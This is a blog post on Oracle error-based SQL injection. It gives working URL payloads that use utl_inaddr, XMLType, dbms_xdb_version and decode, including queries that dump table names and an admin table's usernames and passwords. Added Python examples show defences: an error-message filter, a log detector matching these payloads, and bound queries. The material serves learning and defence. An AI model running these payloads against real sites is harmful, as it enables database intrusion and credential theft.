Oracle error injection summary

0x00 Foreword

When an Oracle database returns its error messages to the page during injection, error-based injection should be the first choice: it uses the error to bring the results of a query out onto the error page.

Error-based injection of this kind requires a comparison operator, such as 1=[error expression] or 1>[error expression], to trigger the error (in MySQL the function alone is enough to raise the error); error-based injection in MSSQL works in a similar way.

Detecting the injection point

http://www.jsporcle.com/news.jsp?id=1 and (select count (*) from user_tables)>0 --
http://www.jsporcle.com/news.jsp?id=1 and (select count (*) from dual)>0 --

0x01 Error injection functions

utl_inaddr.get_host_name() for error injection

and 1=utl_inaddr.get_host_name((select user from dual))--
http://www.jsporcle.com/news.jsp?id=1 and 1=utl_inaddr.get_host_name((select user from dual))--

utl_inaddr.get_host_address() is meant to resolve a host name to an IP address, but if it is passed a parameter that cannot be resolved, Oracle returns an error that displays the parameter it was passed.

Our parameter is the result of a SQL statement, so the returned error contains the result of that statement. After Oracle starts, a number of system variables are placed in specific views, and these views can be queried to obtain what you want. They usually contain very important information.
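
The technique above only works when the application forwards the raw database error to the client. The following is an added example, not part of the original post, of the server-side control that breaks it: a small WSGI filter that strips any ORA-nnnnn message from an outgoing response, logs it under a correlation reference and returns a generic error page. The error text in the demo app is a constructed sample, and the X-Request-Id header name is an assumption about the reverse proxy.

```python
import logging
import re
from typing import List, Tuple

# Oracle errors are reported as "ORA-" plus a five-digit code followed by the
# message text, and the message text is exactly where an echoed argument ends up.
ORA_ERROR_RE = re.compile(r"ORA-\d{5}:[^\r\n<]*")

GENERIC_ERROR_BODY = "An internal error occurred. Reference: {ref}"

log = logging.getLogger("oracle-error-filter")


def scrub_oracle_errors(body: str, ref: str) -> Tuple[str, List[str]]:
    """Return (sanitized_body, leaked_messages).

    Every ORA-nnnnn message found in the body is logged server-side under the
    correlation reference and the whole body is replaced by a generic page, so
    the client never sees database state.
    """
    leaked = ORA_ERROR_RE.findall(body)
    if not leaked:
        return body, []
    for msg in leaked:
        log.warning("ref=%s suppressed database error: %s", ref, msg)
    return GENERIC_ERROR_BODY.format(ref=ref), leaked


def error_filter_middleware(app):
    """Wrap a WSGI application so that ORA- messages never reach the client.

    The downstream response is buffered, scrubbed, and downgraded to 500 when a
    leak was found so that monitoring counts the event.
    """
    def wrapped(environ, start_response):
        captured = {}

        def capturing_start_response(status, headers, exc_info=None):
            captured["status"] = status
            captured["headers"] = list(headers)

        body = b"".join(app(environ, capturing_start_response))
        text = body.decode("utf-8", errors="replace")
        # Assumption: a reverse proxy sets X-Request-Id; fall back to a marker.
        ref = environ.get("HTTP_X_REQUEST_ID", "no-request-id")
        clean, leaked = scrub_oracle_errors(text, ref)
        status = "500 Internal Server Error" if leaked else captured["status"]
        headers = [(k, v) for k, v in captured["headers"]
                   if k.lower() != "content-length"]
        data = clean.encode("utf-8")
        headers.append(("Content-Length", str(len(data))))
        start_response(status, headers)
        return [data]

    return wrapped


def run_demo() -> Tuple[str, str]:
    """Constructed downstream app that leaks a database error, run through the filter."""
    def leaky_app(environ, start_response):
        start_response("200 OK", [("Content-Type", "text/html")])
        # Constructed sample of an unhandled-exception page: the error message
        # carries the value that an injected subquery produced.
        return [b"<html>java.sql.SQLException: ORA-29257: host SYSTEM unknown</html>"]

    result = {}

    def start_response(status, headers, exc_info=None):
        result["status"] = status

    chunks = error_filter_middleware(leaky_app)(
        {"HTTP_X_REQUEST_ID": "demo-1"}, start_response)
    return result["status"], b"".join(chunks).decode("utf-8")


if __name__ == "__main__":
    print(run_demo())
```

The filter is a last line of defence, not a substitute for fixing the query: it removes the channel the error-based payloads need (the echoed message), while the logged reference lets responders correlate the suppressed error with the request that caused it.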

ctxsys.drithsx.sn() for error injection

http://www.jsporcle.com/news.jsp?id=1 and 1=ctxsys.drithsx.sn(1,(select user from dual)) --

XMLType() for error injection

and (select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null --
http://www.jsporcle.com/news.jsp?id=1 and (select upper(XMLType(chr(60)%7c%7cchr(58)%7c%7c(select user from dual)%7c%7cchr(62))) from dual) is not null --

dbms_xdb_version.checkin() for error injection

and (select dbms_xdb_version.checkin((select user from dual)) from dual) is not null --
Query version information:
http://www.jsporcle.com/news.jsp?id=1 and (select dbms_xdb_version.checkin((select banner from sys.v_$version where rownum=1)) from dual) is not null --

dbms_xdb_version.makeversioned() for error injection

and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null --

dbms_xdb_version.uncheckout() for error injection

and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null --

dbms_utility.sqlid_to_sqlhash() for error injection

and (SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null --

ordsys.ord_dicom.getmappingxpath() for error injection

and 1=ordsys.ord_dicom.getmappingxpath((select user from dual),user,user)--

decode() for error injection

This approach is closer to boolean-based injection: it does not echo the query result through the error message, but only serves as a way of telling the two page states apart.

and 1=(select decode(substr(user,1,1),'S',(1/0),0) from dual) --
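
Every function listed in 0x01 has a distinctive name, so the payloads stand out in web-server logs. The following added example (mine, not the post's) runs a classifier over a few constructed Apache-style access-log lines and flags the indicators from this write-up: the error-raising function names, the decode(...,(1/0),...) pattern and references to system views such as user_tables and dual. The log lines, the source addresses and the indicator labels are constructed for the example.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Function names from the write-up above; each raises an error whose text
# echoes its argument, so their presence in a request parameter is a strong signal.
ERROR_FUNCTIONS = (
    "utl_inaddr.get_host_name",
    "utl_inaddr.get_host_address",
    "ctxsys.drithsx.sn",
    "xmltype(",
    "dbms_xdb_version.checkin",
    "dbms_xdb_version.makeversioned",
    "dbms_xdb_version.uncheckout",
    "dbms_utility.sqlid_to_sqlhash",
    "ordsys.ord_dicom.getmappingxpath",
)

# decode(...,(1/0),...) is the boolean-style variant: no echo, but a deliberate
# division by zero that only fires when the compared character matches.
DECODE_DIV_ZERO = re.compile(r"decode\s*\(.*1\s*/\s*0", re.I | re.S)

# Client-supplied references to Oracle system views are not normal parameter data.
SYSTEM_VIEW = re.compile(
    r"\bfrom\s+(?:user_tables|all_tables|user_tab_columns|all_tab_columns"
    r"|sys\.v_\$version|dual)\b", re.I)

# Constructed access-log lines: the first two carry payloads from the write-up,
# the other two are ordinary traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [30/May/2019:15:00:01 +0800] "GET /news.jsp?id=1%20and%201=utl_inaddr.get_host_name((select%20user%20from%20dual))-- HTTP/1.1" 500 812
10.0.0.5 - - [30/May/2019:15:00:02 +0800] "GET /news.jsp?id=1%20and%201=(select%20decode(substr(user,1,1),'S',(1/0),0)%20from%20dual)%20-- HTTP/1.1" 500 812
10.0.0.7 - - [30/May/2019:15:00:03 +0800] "GET /news.jsp?id=1 HTTP/1.1" 200 4311
10.0.0.8 - - [30/May/2019:15:00:04 +0800] "GET /news.jsp?id=42&lang=en HTTP/1.1" 200 4021
"""

REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')


def classify_request(target: str) -> List[str]:
    """Return the indicators found in one request target (path plus query)."""
    query = urlsplit(target).query
    indicators = []
    for _, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl decodes once; decode again because the write-up's URLs show
        # sequences like %7c%7c that proxies sometimes re-encode.
        text = unquote_plus(value).lower()
        for fn in ERROR_FUNCTIONS:
            if fn in text:
                indicators.append(f"error-function:{fn}")
        if DECODE_DIV_ZERO.search(text):
            indicators.append("decode-div-zero")
        if SYSTEM_VIEW.search(text):
            indicators.append("system-view")
    return indicators


def scan_log(text: str) -> List[Dict]:
    """Return one record per log line that carries at least one indicator."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        src, ts, target, status = m.groups()
        indicators = classify_request(target)
        if indicators:
            hits.append({"src": src, "time": ts, "status": int(status),
                         "indicators": indicators})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Matching on the function names catches the echo-based payloads; the decode and system-view rules also catch the boolean variant, which produces no echoed value and would otherwise look like an ordinary 500. A status code of 500 on the same request is a useful second signal, since the whole technique depends on the query failing.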

0x02 Extracting data with error functions

Injection into an Oracle database differs from other databases such as Access and MySQL: Oracle contains several system tables that store the table names and column names of the system database, such as user_tab_columns, all_tab_columns, all_tables and user_tables. These system tables store all of a user's tables and column names; table_name holds the table names in the system and column_name holds the column names that exist in the system.

Dumping the database owner: first record

http://www.jsporcle.com/news.jsp?id=1 and 1=utl_inaddr.get_host_name((select (SELECT DISTINCT owner FROM all_tables where rownum=1) from dual))--

Dumping tables: first record

http://www.jsporcle.com/news.jsp?id=1 and 1=utl_inaddr.get_host_name((select table_name from user_tables where rownum=1)) --

Second record

http://www.jsporcle.com/news.jsp?id=1 and 1=utl_inaddr.get_host_name((select table_name from user_tables where rownum=1 and table_name not in ('LOGMNR_SESSION_EVOLVE$'))) --

Dumping the username and password from the admin table via the error

http://www.jsporcle.com/news.jsp?id=1 and 1=utl_inaddr.get_host_name((select (select username%7c%7cpassword from admin)from dual))--

The other error functions work in much the same way.
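
The extraction queries above only work because the id parameter is concatenated into the SQL text. The following added example (not from the original post) shows the contrast: a vulnerable string-building function beside a version that validates the id as an integer and passes it as a bind variable, so the SQL text never changes whatever the client sends. Oracle is not available offline, so an in-memory sqlite3 database stands in for it; the :id bind syntax is the same one python-oracledb uses. The news table, its columns and its rows are constructed for the demo.

```python
import sqlite3


def build_news_query_unsafe(raw_id: str) -> str:
    """The vulnerable pattern behind news.jsp?id=1: the parameter is pasted into
    the SQL text, so whatever follows the number becomes part of the query."""
    return "SELECT title FROM news WHERE id = " + raw_id


def parse_news_id(raw_id: str) -> int:
    """First line of defence: the id is an integer, so anything else is rejected
    before any SQL is built."""
    if not raw_id.isdigit():
        raise ValueError("id must be a positive integer")
    return int(raw_id)


def rejects(raw_id: str) -> bool:
    """True when validation refuses the value."""
    try:
        parse_news_id(raw_id)
    except ValueError:
        return True
    return False


# Named bind variable; python-oracledb and sqlite3 both accept this form.
SAFE_QUERY = "SELECT title FROM news WHERE id = :id"


def fetch_news_title(conn, raw_id: str):
    """Validate, then bind. The statement text is constant and the value travels
    to the database as data, never as SQL."""
    news_id = parse_news_id(raw_id)
    cur = conn.execute(SAFE_QUERY, {"id": news_id})
    row = cur.fetchone()
    return row[0] if row else None


def make_demo_db():
    """Constructed stand-in for the application's news table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)",
                     [(1, "Welcome"), (2, "Release notes")])
    return conn


if __name__ == "__main__":
    conn = make_demo_db()
    payload = "1 and 1=utl_inaddr.get_host_name((select user from dual))--"
    print("unsafe text:", build_news_query_unsafe(payload))
    print("rejected:", rejects(payload))
    print("row for id 1:", fetch_news_title(conn, "1"))
```

The two controls are independent: binding alone already keeps the parameter out of the SQL grammar, and the integer check additionally stops malformed input from ever reaching the database, which is where the error messages this write-up relies on are produced.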

Posted @ 2019-05-30 15:00 by 卿先生

Origin blog.csdn.net/qq_17204441/article/details/90702797